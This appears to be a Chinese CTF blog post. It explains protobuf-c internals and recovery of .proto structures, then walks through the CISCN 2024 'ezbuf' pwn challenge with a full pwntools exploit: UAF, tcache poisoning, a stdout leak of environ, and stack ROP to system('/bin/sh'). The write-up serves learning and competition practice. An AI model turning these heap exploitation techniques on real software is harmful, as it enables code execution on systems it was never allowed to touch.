protobuf

Protobuf(Protocol Buffers)是谷歌开发的一款跟平台和语言无关、可扩展、轻量级高效的序列化的结构类型。是一种高效的数据压缩编码方式,可用于通信协议,数据存储等。

能够将数据结构体序列化为bytes字节流,也能将bytes字节流反序列化成数据结构体。

安装protobuf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#在ubuntu22.04下
git clone -b v3.21.0 https://github.com/protocolbuffers/protobuf.git # 需要大于3.20,不然后面会出现依赖问题
sudo apt-get install autoconf automake libtool curl make g++ unzip # 所需依赖
sudo ./autogen.sh # 生成配置脚本
sudo ./configure # 可选 --prefix=path ,默认路径为/usr/local/
make -j`nproc`
sudo make install
protoc --version # 检查protoc是否安装成功

# 安装 protobuf-c
git clone https://github.com/protobuf-c/protobuf-c.git
./autogen.sh && ./configure
make -j8
sudo make install

Protobuf的使用以及逆向分析

首先创建一个简单的proto例子:

1
2
3
4
5
6
7
8
syntax = "proto3";

message devicemsg{
bytes con = 1;
sint64 idx = 2;
sint64 size = 3;
sint64 chunk_this = 4;
}

分析C语言中的内容

1
protoc --c_out=./ z0yuan.proto

--c_out=./将.proto文件以c语言格式输出在当前目录下,之后会生成z0yuan.pb-c.c 、z0yuan.pb-c.h两个文件。

查看.c文件内容

关键函数——序列化函数和反序列化函数

1
2
3
4
5
6
7
8
9
size_t devicemsg__pack(const Devicemsg *message, uint8_t *out) {//序列化
assert(message->base.descriptor == &devicemsg__descriptor);
return protobuf_c_message_pack((const ProtobufCMessage *)message, out);
}

Devicemsg *devicemsg__unpack(ProtobufCAllocator *allocator, size_t len, const uint8_t *data) {//反序列化
return (Devicemsg *)protobuf_c_message_unpack(&devicemsg__descriptor, allocator, len, data);
}

pack用来序列化得到bytes字节流unpack用来反序列化得到结构数据

注意看unpack函数,第一个allocator一般为0,第二个为数据包长度,第三个是数据字节流。通过执行内置函数protobuf_c_message_unpack来实现反序列化将字节流数据转化为结构数据。其中devicemsg_descriptor就是一个描述先前定义的message结构的数据。返回地址就是之前定义的message结构体。

描述符结构体

devicemsg__descriptor为ProtobufCMessageDescriptor类型的一个结构。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/**
* Describes a message.
*/
struct ProtobufCMessageDescriptor {
/** Magic value checked to ensure that the API is used correctly. */
uint32_t magic;

/** The qualified name (e.g., "namespace.Type"). */
const char *name;
/** The unqualified name as given in the .proto file (e.g., "Type"). */
const char *short_name;
/** Identifier used in generated C code. */
const char *c_name;
/** The dot-separated namespace. */
const char *package_name;

/**
* Size in bytes of the C structure representing an instance of this
* type of message.
*/
size_t sizeof_message;

/** Number of elements in `fields`. */
unsigned n_fields;
/** Field descriptors, sorted by tag number. */
const ProtobufCFieldDescriptor *fields;
/** Used for looking up fields by name. */
const unsigned *fields_sorted_by_name;

/** Number of elements in `field_ranges`. */
unsigned n_field_ranges;
/** Used for looking up fields by id. */
const ProtobufCIntRange *field_ranges;

/** Message initialisation function. */
ProtobufCMessageInit message_init;

/** Reserved for future use. */
void *reserved1;
/** Reserved for future use. */
void *reserved2;
/** Reserved for future use. */
void *reserved3;
};

关键点:

  1. magic,一般为0x28AAEEF9
  2. n_fields,关系到原始的message结构内有几条记录(本篇例子中有4条记录)
  3. fields,这个指向message内所有记录类型组成的一个数组,可以借助此部分内容逆向分析message结构。

fields结构体

重点要看fields,这个是ProtobufCFieldDescriptor类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
struct ProtobufCFieldDescriptor {
/** Name of the field as given in the .proto file. */
const char *name;
/** Tag value of the field as given in the .proto file. */
uint32_t id;
/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
ProtobufCLabel label;
/** The type of the field. */
ProtobufCType type;
/**
* The offset in bytes of the message's C structure's quantifier field
* (the `has_MEMBER` field for optional members or the `n_MEMBER` field
* for repeated members or the case enum for oneofs).
*/
unsigned quantifier_offset;
/**
* The offset in bytes into the message's C structure for the member
* itself.
*/
unsigned offset;
/**
* A type-specific descriptor.
*
* If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
* corresponding `ProtobufCEnumDescriptor`.
*
* If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
* the corresponding `ProtobufCMessageDescriptor`.
*
* Otherwise this field is NULL.
*/
const void *descriptor; /* for MESSAGE and ENUM types */
/** The default value for this field, if defined. May be NULL. */
const void *default_value;
/**
* A flag word. Zero or more of the bits defined in the
* `ProtobufCFieldFlag` enum may be set.
*/
uint32_t flags;
/** Reserved for future use. */
unsigned reserved_flags;
/** Reserved for future use. */
void *reserved2;
/** Reserved for future use. */
void *reserved3;
};

关键点:

  1. name,名字,变量名
  2. id,序号(在message结构体中的顺序)
  3. label(在proto2语法中对应的是required、optional)
  4. type,数据类型,sting还是int64等,label和type都是枚举类型,占四个字节。

类型表

从0开始

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
typedef enum {
PROTOBUF_C_TYPE_INT32, /**< int32 */
PROTOBUF_C_TYPE_SINT32, /**< signed int32 */
PROTOBUF_C_TYPE_SFIXED32, /**< signed int32 (4 bytes) */
PROTOBUF_C_TYPE_INT64, /**< int64 */
PROTOBUF_C_TYPE_SINT64, /**< signed int64 */
PROTOBUF_C_TYPE_SFIXED64, /**< signed int64 (8 bytes) */
PROTOBUF_C_TYPE_UINT32, /**< unsigned int32 */
PROTOBUF_C_TYPE_FIXED32, /**< unsigned int32 (4 bytes) */
PROTOBUF_C_TYPE_UINT64, /**< unsigned int64 */
PROTOBUF_C_TYPE_FIXED64, /**< unsigned int64 (8 bytes) */
PROTOBUF_C_TYPE_FLOAT, /**< float */
PROTOBUF_C_TYPE_DOUBLE, /**< double */
PROTOBUF_C_TYPE_BOOL, /**< boolean */
PROTOBUF_C_TYPE_ENUM, /**< enumerated type */
PROTOBUF_C_TYPE_STRING, /**< UTF-8 or ASCII string */
PROTOBUF_C_TYPE_BYTES, /**< arbitrary byte sequence */
PROTOBUF_C_TYPE_MESSAGE, /**< nested message */
} ProtobufCType;

结构体信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
static const ProtobufCFieldDescriptor devicemsg__field_descriptors[4] =
{
{
"con",
1,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_BYTES,
0, /* quantifier_offset */
offsetof(Devicemsg, con),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"idx",
2,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, idx),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"size",
3,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, size),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"chunk_this",
4,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, chunk_this),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
};
static const unsigned devicemsg__field_indices_by_name[] = {
3, /* field[3] = chunk_this */
0, /* field[0] = con */
1, /* field[1] = idx */
2, /* field[2] = size */
};
static const ProtobufCIntRange devicemsg__number_ranges[1 + 1] =
{
{ 1, 0 },
{ 0, 4 }
};
const ProtobufCMessageDescriptor devicemsg__descriptor =
{
PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,
"devicemsg",
"Devicemsg",
"Devicemsg",
"",
sizeof(Devicemsg),
4,
devicemsg__field_descriptors,
devicemsg__field_indices_by_name,
1, devicemsg__number_ranges,
(ProtobufCMessageInit) devicemsg__init,
NULL,NULL,NULL /* reserved[123] */
};

可以分析与ProtobufCFieldDescriptor类型对应的结构来还原message结构体

利用Python配合protobuf打包

执行命令

1
protoc --python_out=./ z0yuan.proto

生成z0yuan_pb2.py

打包模板

1
2
3
4
5
6
7
import z0yuan_pb2.py
data = z0yuan_pb2.devicemsg()#方法命名随.proto中结构体名称变化
data.con = con
data.idx = idx
data.size = size
data.chunk_this = this
data.SerializeToString()#序列化为bytes字节流

Pbtk提取proto结构

pbtk工具可以直接提取程序中的proto结构,这样就方便生成python包然后进行解题。

1
2
3
4
5
6
sudo apt install python3-pip git openjdk-9-jre libqt5x11extras5 python3-pyqt5.qtwebengine python3-pyqt5
sudo pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client

git clone https://github.com/marin-m/pbtk
cd pbtk
./gui.py

命令

1
2
cd pbtk
./extractors/from_binary.py 二进制文件 保存提取的proto文件路径

CISCN 2024 ezbuf例题

恢复proto结构体

这道题无法利用工具pbtk直接提取,所以需要手动逆向分析提取。

image-20240702174604857

关键的结构体部分在这,根据这段连续的data来恢复结构体。1代表的是序号,3代表的是label,0xf代表的是Type类型,查表即可

最终恢复proto结构体如下:

1
2
3
4
5
6
7
8
9
syntax="proto3";

message heybro{
bytes whatcon = 1;
sint64 whattodo = 2;
sint64 whatidx = 3;
sint64 whatsize = 4;
uint32 whatsthis = 5;
}

还原C语言的结构体

1
2
3
4
5
6
7
8
9
//ProtobufCMessage结构体
struct ProtobufCMessage {
/** The descriptor for this message type. */
const ProtobufCMessageDescriptor *descriptor;
/** The number of elements in `unknown_fields`. */
unsigned n_unknown_fields;
/** The fields that weren't recognized by the parser. */
ProtobufCMessageUnknownField *unknown_fields;
};

结构体大小对齐后是24字节。

bytes类型,转化为c语言结构时会变成一个结构体,里面存放长度和内容指针。

1
2
3
4
struct ProtobufCBinaryData {
size_t len; /**< Number of bytes in the `data` field. */
uint8_t *data; /**< Data bytes. */
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

struct Heybro
{
ProtobufCMessage base; //24个字节
ProtobufCBinaryData whatcon;//实际上变为大小为16字节的结构体,里面分别存放长度和内容指针
int64_t whattodo;
int64_t whatidx;
int64_t whatsize;
uint32_t whatsthis;
};

struct ProtobufCMessage {
/** The descriptor for this message type. */
const ProtobufCMessageDescriptor *descriptor;
/** The number of elements in `unknown_fields`. */
unsigned n_unknown_fields;
/** The fields that weren't recognized by the parser. */
ProtobufCMessageUnknownField *unknown_fields;
};

struct ProtobufCBinaryData {
size_t len; /**< Number of bytes in the `data` field. */
uint8_t *data; /**< Data bytes. */
};

代码分析

image-20240702175848274

由于ida会把bytes转化的结构体内容当作8字节数组解析,所以前两个实际上是代表同一个记录。

分别对应的是五个记录,而不是ida显示的6个。

其中v4+40对应的是whattodo也就是a3

image-20240702211449513

  • 函数0只是解析数据包,但是会根据数据包的长度申请堆块,比如func0(str) –> malloc(len(str)),实际上就是反序列化数据包时,需要申请一个数据包大小的chunk来保存数据
  • 函数1创建0x30大小的chunk并且将数据(此处的数据就是unpack函数中通过创建堆块来保存的content数据)复制过去
  • 函数2是释放chunk的功能,存在UAF,但是最多释放10次
  • 函数3是打印功能,超过两次会关闭标准输入流和标准输出流

利用思路

先申请0x30大小的chunk来切割unsortedbin泄露libc,然后再释放一个chunk来泄露heap_key和heap_base。利用fastbin中的double_free触发malloc_consolidate使得fastbin中的chunk进入到tcache中,此时可以任意写一次。

image-20240702235952366

观察此时的bin,由于glibc-2.35没有hook,所以可以利用申请到栈中内容打ret2libc。所以此时需要的条件就是泄露出environ的内容,并且能申请到栈内存。

此时就要利用好函数0的功能了,因为函数0虽然只解析数据包,但是会有一步根据数据包长度进行堆块申请的操作。

注意到此时bin中有0xf0,所以可以先修改tcache的fd指针指向tcache_perthread_struct+0xf0,修改内容为tcache_perthread_struct。

image-20240703000503773

可以看到此时0xf0处保存的就是tcache_perthread_struct+0x10。

此时如果触发函数0,并且数据包的长度为0xe0的话,那么数据包的内容就会写入到tcache_perthread_struct+0x10处。那么就可以控制tcachebin中的chunk数量以及chunk指针。我们控制其指向IO_stdout,然后申请出IO_stdout通过修改write_base和write_prt来触发IO_leak泄露出environ的内容也就是栈地址,但是需要注意的是还需要控制0xb0处的chunk指针为tcache_perthread_struct+0x10,这样就能再次利用申请出栈内存。

image-20240703000901177

image-20240703000918687

泄露完environ之后的bins:

image-20240703001134857

再利用0xb0这个chunk控制tcache_perthread_struct的内容来申请出栈内存

image-20240703001225093

劫持的是这个函数的返回地址

image-20240703001302510

构造ROP即可触发system(‘/bin/sh\x00’)

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 1
if debug:
p = process('./pwn')
elf = ELF('./pwn')
# p = process('', env={'LD_PRELOAD':'./libc.so'})
# gdb.attach(p)
else:
p = remote('127.0.0.1', 10001)
elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
import ezbuf_pb2
libc = ELF('./libc.so.6')
data = ezbuf_pb2.heybro()
def add(idx,content):
rl("WHAT DO YOU WANT?\n")
data.whatcon = content
data.whattodo = 1
data.whatidx = idx
data.whatsize = 0
data.whatsthis = 0
s(data.SerializeToString())
def delete(idx):
rl("WHAT DO YOU WANT?\n")
data.whatcon = b'\x00'
data.whattodo = 2
data.whatidx = idx
data.whatsize = 0
data.whatsthis = 0
s(data.SerializeToString())
def show(idx):
rl("WHAT DO YOU WANT?\n")
data.whatcon = b'\x00'
data.whattodo = 3
data.whatidx = idx
data.whatsize = 0
data.whatsthis = 0
s(data.SerializeToString())
def clean(mem):
rl("WHAT DO YOU WANT?\n")
data.whatcon=mem
data.whattodo=0
data.whatidx=0
data.whatsize=0x20
data.whatsthis=0x20
s(data.SerializeToString())


# gdb.attach(p)
for i in range(9):
add(i,b'aaaaaaab')
show(0)
rl('b')
libc_leak = uu64()
lg("libc_leak",libc_leak)
libc_base = libc_leak-0x21ace0
lg("libc_base",libc_base)
environ = libc_base + libc.sym['environ']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
io_stdout = libc_base + libc.sym['_IO_2_1_stdout_']
ret = 0x000000000002a3e6 + libc_base
pop_rdi = 0x000000000002a3e5 + libc_base

delete(0)
show(0)
rl("Content:")
heap_key = u64(p.recv(5).ljust(8, b'\x00'))
lg("heap_key",heap_key)
heap_base = heap_key << 12
heap_base = heap_base-0x2000
lg("heap_base",heap_base)

for i in range(1,9):
delete(i)
delete(7)
for i in range(7):
add(i,b'aaaaaaab')
# pause()
add(7,p64((heap_key+2)^(heap_base+0xf0)))
add(8,b'aaaaaaab')
add(9,b'aaaaaaab')
add(10,p64(0)+p64(heap_base+0x10))
# pause()
clean((((p16(0)*2+p16(1)+p16(1)).ljust(0x10,b"\x00")+p16(1)+p16(1)).ljust(0x90,b'\x00')+p64(io_stdout)+p64(io_stdout)+p64(0)*5+p64(heap_base+0x10)).ljust(0xe0,b"\x00"))
# pause()
clean(p64(0xFBAD1800)+p64(0)*3+p64(environ)+p64(environ+0x8))
stack_addr = l64()-0x168
lg("stack_addr",stack_addr)
# pause()
clean(((p16(0)*2+p16(0)+p16(0)+p16(1)).ljust(0x10,b"\x00")+p16(1)+p16(1)).ljust(0x90,b'\x00')+p64(0)+p64(0)+p64(stack_addr))

# pause()
clean((b"a"*0x8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)).ljust(0x50,b"\x00"))

inter()

image-20240703001425453

参考

1
2
3
4
https://www.cnblogs.com/JmpCliff/articles/17595397.html
https://www.y4ng.cn/posts/pwn/protobuf/
https://mp.weixin.qq.com/s/RYa2wMD1KIC9IMQ_9NktiQ
https://blog.csdn.net/llovewuzhengzi/article/details/139435895